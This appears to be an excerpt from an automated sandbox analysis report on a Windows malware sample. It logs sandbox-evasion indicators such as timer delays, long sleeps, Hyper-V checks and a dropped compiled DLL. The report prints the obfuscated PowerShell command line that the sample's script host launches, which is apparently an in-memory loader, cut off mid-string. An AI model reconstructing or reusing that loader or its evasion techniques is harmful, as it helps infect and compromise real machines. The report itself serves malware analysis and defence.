Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: Initial fileInitial file: do while timer-temp<sec
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1668Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.dllJump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8782
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: powershell.exe, 00000003.00000002.833621098.0000000005416000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V
Source: powershell.exe, 00000003.00000002.827196045.0000000004F35000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ,l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V-c
Source: powershell.exe, 00000003.00000002.833621098.0000000005416000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ,l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$biliate = """laabrdgedga-sttdiycopsteun st-udthoyaupepewrdreetrfpaiusnumiretcoimaofrnsv sm'reusksunifuncogkn tosphyprsjatnuesimst;viusmsprisknangim prsplyeusgrtgueoemfo.rerpuuconhutsoifrmfreil.joifonsntsnelurcoopapjastrererelvkuiticreefesbr;ampupukobsnlvoidecaw sasrutrhajetaaitecsv brceslfoaunsvasle ebtinubaebaiourceokonpr1ci sh{ti[phdaflullbuimimhapmaoafreutan(ad`"""inuluskiekarme3br2si`"""rr)ri]gopmauflbstlmeitycsa aeskatinahjtsmisvcne stehoxattimeteropnna gribenbrtno yddmierestotenrbrostyovcspamermiecotkl(sn)me;sm[afdepllulreienmflprdoharegtbr(ov`"""migaldmeipl3in2er`"""te)ce]tapeuudrbculmaihjcas lgsudttrabrtsqiercco viebextetveetrrhrnma foibanartha stsbrcudagrllaeskwteiscnsudreobuwcrevexchtstesuxkn(noifinkutse modlnrigibefratpl,reiannaltju beaudmambmiupalheaap,diifonkntsp jubprasesvaoqu,mailenimtba noiafadagvrtpotsyaov,chigenpltre divsaetvjsimboasotan1un5fr8ud,giitinstter yemsucslgkursk)eg;ak[kuddilbulimirdmampanovarprtfr(sk`"""svksqerorpinflerelpa3ov2as`"""tr)wo]hepmeurobbalfrilucre hysmitfoaunttaitmcja anedexmitkuesarblnoi reifansutov drhdeestabapblsbeispzbaeko(stiunnditou ycpkerbrourpre,phisonxatcl aianodstrchefosov,viidenjutdi mutimowerartinrfripo)mo;co[sldoplsalspiapmunpreosjrrotko(wh`"""jgsschdiebilshlko3ge2re.vaduflomlun`"""st)un]beppauslboslbeiuncas masmntsyaletfritrcpr noevixratfoererwenun sevenofuitrdrh padterflafigmefciiennstikasbehmi(esibonsutpo opomumpldserge)ba;ej[spdfalbelmeilimhepfroudrgutau(je`"""mawskifantemnumin.apdkolbolfl`"""fu)ho]scpovuprbmdlviialcba bossatasahotliifocsi veenoxluthaebirjenla hoiennnatgu armtjihoxscedartrgswejotcodtrefivsuckeamipqussu(skiblncitch benpribrtserud,uditincotjo vafaseewlob,thivinquteo noaphfafsxi9im3bl)ta;ls[chdculcalhaipumcipicofarretsl(be`"""rekgletrrhinatesilek3sa2ur`"""ti)de]papfeudrbfolopilkctn busabtsyaudtmeisocfr coeimxfatmoefrrnanto trimentotal kaludoescaskqurosepasphoovuforjucapeph(roiafncotte velexesoiun)ir;un[redpiliwloyilammipshostrfatcr(bo`"""flkauecervantoejelav3pl2re`"""se)co]unpanucoboplfoilacla casrotopauntmuikacti wieknxentreeudrtrntr ariponintsl pivinistrpetrauacatilvaatelbelclothcfa(tristnsotwi gevgr1sk,smilunthtor cavbl2ne,keistncotby hevdr3pa,heiganuptku svvca4in)pr;py[drdmalinlpribrmhepploknrpttba(ho`"""craundbevalatopanicr3st2ph.wadbelsalci`"""to)un]stptiurebsylpuiencfo cosmotunaunthuiatcst meemixdotofeadrinnro suvbeoupividti cimtrabipbegateoensleglrpribrccomfiaunsankvn(saisknmetpe plbinrtriodnobkir,doidenqutru camchiuddtitknssn)in;ov[trdrelselfuiunmripgoosuromtsc(ve`"""brkvaemermanpeesklst3co2in`"""ef)ce]bepkoumybkollbicocun edsgatkuatetkoiaaclu noevexprtneeunranncy prisenlvtplpfotborkr scegansuumemfuschyfrspotbeeoomfjlguoflcsranelgaevosprwun(paudiieynsttpe grvex1ma,psihankoten kovgr2ha)et;om[oodrhldilflisumenpskoovrtrtsp(st`"""obkedeelrrentaedaldi3sc2di`"""si)ni]fopchutlbdalcaialcli smsnytvaaretprisuctr luebexgattregermanbr reigunentan unsgieunttiten
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$biliate = """laabrdgedga-sttdiycopsteun st-udthoyaupepewrdreetrfpaiusnumiretcoimaofrnsv sm'reusksunifuncogkn tosphyprsjatnuesimst;viusmsprisknangim prsplyeusgrtgueoemfo.rerpuuconhutsoifrmfreil.joifonsntsnelurcoopapjastrererelvkuiticreefesbr;ampupukobsnlvoidecaw sasrutrhajetaaitecsv brceslfoaunsvasle ebtinubaebaiourceokonpr1ci sh{ti[phdaflullbuimimhapmaoafreutan(ad`"""inuluskiekarme3br2si`"""rr)ri]gopmauflbstlmeitycsa aeskatinahjtsmisvcne stehoxattimeteropnna gribenbrtno yddmierestotenrbrostyovcspamermiecotkl(sn)me;sm[afdepllulreienmflprdoharegtbr(ov`"""migaldmeipl3in2er`"""te)ce]tapeuudrbculmaihjcas lgsudttrabrtsqiercco viebextetveetrrhrnma foibanartha stsbrcudagrllaeskwteiscnsudreobuwcrevexchtstesuxkn(noifinkutse modlnrigibefratpl,reiannaltju beaudmambmiupalheaap,diifonkntsp jubprasesvaoqu,mailenimtba noiafadagvrtpotsyaov,chigenpltre divsaetvjsimboasotan1un5fr8ud,giitinstter yemsucslgkursk)eg;ak[kuddilbulimirdmampanovarprtfr(sk`"""svksqerorpinflerelpa3ov2as`"""tr)wo]hepmeurobbalfrilucre hysmitfoaunttaitmcja anedexmitkuesarblnoi reifansutov drhdeestabapblsbeispzbaeko(stiunnditou ycpkerbrourpre,phisonxatcl aianodstrchefosov,viidenjutdi mutimowerartinrfripo)mo;co[sldoplsalspiapmunpreosjrrotko(wh`"""jgsschdiebilshlko3ge2re.vaduflomlun`"""st)un]beppauslboslbeiuncas masmntsyaletfritrcpr noevixratfoererwenun sevenofuitrdrh padterflafigmefciiennstikasbehmi(esibonsutpo opomumpldserge)ba;ej[spdfalbelmeilimhepfroudrgutau(je`"""mawskifantemnumin.apdkolbolfl`"""fu)ho]scpovuprbmdlviialcba bossatasahotliifocsi veenoxluthaebirjenla hoiennnatgu armtjihoxscedartrgswejotcodtrefivsuckeamipqussu(skiblncitch benpribrtserud,uditincotjo vafaseewlob,thivinquteo noaphfafsxi9im3bl)ta;ls[chdculcalhaipumcipicofarretsl(be`"""rekgletrrhinatesilek3sa2ur`"""ti)de]papfeudrbfolopilkctn busabtsyaudtmeisocfr coeimxfatmoefrrnanto trimentotal kaludoescaskqurosepasphoovuforjucapeph(roiafncotte velexesoiun)ir;un[redpiliwloyilammipshostrfatcr(bo`"""flkauecervantoejelav3pl2re`"""se)co]unpanucoboplfoilacla casrotopauntmuikacti wieknxentreeudrtrntr ariponintsl pivinistrpetrauacatilvaatelbelclothcfa(tristnsotwi gevgr1sk,smilunthtor cavbl2ne,keistncotby hevdr3pa,heiganuptku svvca4in)pr;py[drdmalinlpribrmhepploknrpttba(ho`"""craundbevalatopanicr3st2ph.wadbelsalci`"""to)un]stptiurebsylpuiencfo cosmotunaunthuiatcst meemixdotofeadrinnro suvbeoupividti cimtrabipbegateoensleglrpribrccomfiaunsankvn(saisknmetpe plbinrtriodnobkir,doidenqutru camchiuddtitknssn)in;ov[trdrelselfuiunmripgoosuromtsc(ve`"""brkvaemermanpeesklst3co2in`"""ef)ce]bepkoumybkollbicocun edsgatkuatetkoiaaclu noevexprtneeunranncy prisenlvtplpfotborkr scegansuumemfuschyfrspotbeeoomfjlguoflcsranelgaevosprwun(paudiieynsttpe grvex1ma,psihankoten kovgr2ha)et;om[oodrhldilflisumenpskoovrtrtsp(st`"""obkedeelrrentaedaldi3sc2di`"""si)ni]fopchutlbdalcaialcli smsnytvaaretprisuctr luebexgattregermanbr reigunentan unsgieunttiten
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Biliate = """LaABrdGedGa-StTDiyCopsteUn St-UdThoyAupepeWrDReeTrfPaiUsnUmiRetCoiMaoFrnSv Sm'ReuSksUniFunCogKn ToSPhyPrsJatNueSimst;viuSmsPriSknangIm PrSPlyEusGrtgueoemFo.ReRPuuConHutSoiFrmFreIl.JoIFonSntSneLurCooPapJaSTreRerElvKuiticReeFesBr;AmpUpuKobsnlVoiDecAw sasRutRhajetaaiTecSv BrcEslFoaUnsVasLe EbTInuBaeBaiOurCeoKonPr1Ci Sh{Ti[PhDAflUllBuIMimHapMaoAfrEutAn(ad`"""InuLusKieKarMe3Br2Si`"""Rr)Ri]GopMauFlbStlMeiTycSa AesKatInaHjtSmiSvcNe SteHoxattImeTerOpnNa GriBenBrtNo YdDMieResTotEnrBroStyOvCspaMerMieCotKl(sn)Me;Sm[AfDEplLulReIenmFlpRdoHarEgtBr(Ov`"""MigAldMeiPl3In2Er`"""Te)Ce]tapEuuDrbCulMaiHjcAs LgsUdtTraBrtSqiercCo VieBexTetVeetrrHrnMa FoiBanArtHa StSBrcUdaGrlLaeSkWTeiScnSudReoBuwCrEVexChtstESuxKn(NoiFinKutSe MoDLnrIgiBefRatPl,ReiAnnAltJu BeAUdmAmbMiuPalHeaAp,DiiFonKntSp juBpraSesVaoQu,MaiLenImtBa NoiAfaDagVrtPotSyaOv,ChiGenpltRe diVSaeTvjSimboaSotAn1Un5Fr8Ud,GiiTinSttEr YeMSucSlgKurSk)Eg;Ak[KuDDilBulImIRdmAmpAnoVarPrtFr(Sk`"""SvkSqeRorpinFleRelPa3Ov2as`"""Tr)Wo]hepMeuRobBalFriLucRe HysMitFoaUntTaiTmcJa aneDexMitKueSarBlnOi ReiFanSutov drHDeeStaBapBlSBeiSpzBaeKo(StiUnnDitOu YcPKerBroUrpRe,PhiSonxatCl AiANodStrCheFosOv,ViiDenJutDi MuTImoWerArtInrfriPo)Mo;Co[SlDOplSalSpIApmunpReoSjrRotKo(wh`"""JgsSchdieBilShlko3Ge2re.VadUflOmlUn`"""St)Un]BepPauSlbOslBeiUncAs MasMntSyaLetFriTrcpr NoeVixRatFoeRerWenun SevEnofuiTrdRh PaDterFlaFigMeFCiiEnnStiKasBehMi(EsiBonSutPo OpOMumPldSerGe)Ba;Ej[SpDFalBelMeILimhepFroUdrGutAu(Je`"""mawSkifanTemNumIn.ApdKolBolFl`"""Fu)Ho]ScpOvuPrbMdlViiAlcBa BosSatAsaHotLiiFocSi VeeNoxLutHaeBirJenLa HoiennNatGu ArmtjiHoxSceDarTrGSwejotCoDTreFivSuCKeaMipqusSu(SkiBlnCitCh BeNPriBrtSerUd,UditinCotJo VaFaseEwlOb,ThivinQutEo NoAPhfAfsXi9Im3Bl)Ta;Ls[ChDCulCalHaIPumCipIcoFarRetSl(Be`"""RekGleTrrhinAteSilEk3Sa2ur`"""Ti)De]PapFeuDrbFolOpiLkcTn BusAbtSyaUdtMeiSocfr CoeImxFatMoeFrrnanto triMenTotAl KaLUdoEscAskQuRosepasphoOvuForJucApeph(RoiAfnCotTe VeLExeSoiUn)Ir;Un[ReDPilIwlOyILammipShoStrFatCr(Bo`"""FlkAueCervanToeJelAv3Pl2Re`"""Se)Co]UnpAnuCobOplFoilacLa CasrotOpaUntMuiKacTi WieKnxEntReeUdrTrnTr AriPonIntSl PiVIniStrpetrauAcaTilvaATelBelCloThcFa(TriStnSotWi GevGr1Sk,SmiLunThtOr CavBl2Ne,KeiStnCotBy Hevdr3pa,HeiGanUptku SvvCa4In)pr;Py[DrDMalInlPrIBrmHepPloKnrPttba(Ho`"""CrAUnDBeVAlAToPanICr3St2Ph.WaDBeLSaLCi`"""To)Un]StpTiuRebSylPuiEncFo CosMotUnaUntHuiAtcst MeeMixDotOfeAdrInnRo SuvBeoUpiVidTi CiMTraBipBeGAteOenSleGlrPriBrcCoMFiaUnsAnkVn(SaiSknMetPe PlBInrTriOdnObkIr,DoiDenQutRu CaMChiUddtitKnsSn)In;Ov[TrDRelSelFuIUnmRipGoosurOmtSc(Ve`"""BrkVaeMerManPeeSklSt3Co2In`"""ef)Ce]BepKouMybKolLbiCocUn EdsGatKuaTetKoiaacLu NoeVexPrtNeeUnrAnnCy PrISenLvtPlPFotBorkr ScEGanSuumemfuSChyFrsPotBeeOomFjLGuoFlcSraNelGaeVosPrWUn(PauDiiEynSttPe GrvEx1ma,PsiHanKotEn KovGr2Ha)Et;Om[OoDrhlDilFlIsumEnpSkoOvrTrtSp(St`"""ObkEdeElrRenTaeDalDi3Sc2Di`"""Si)Ni]FopChuTlbDalCaiAlcLi SmsNytvaaretPriSucTr LueBexGatTreGerManbr ReiGunentAn UnSGieUntTiTEn
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8B47.tmp" "c:\Users\user\AppData\Local\Temp\jadyuuoq\CSC891590C19254105A6A792E8745AF5FD.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
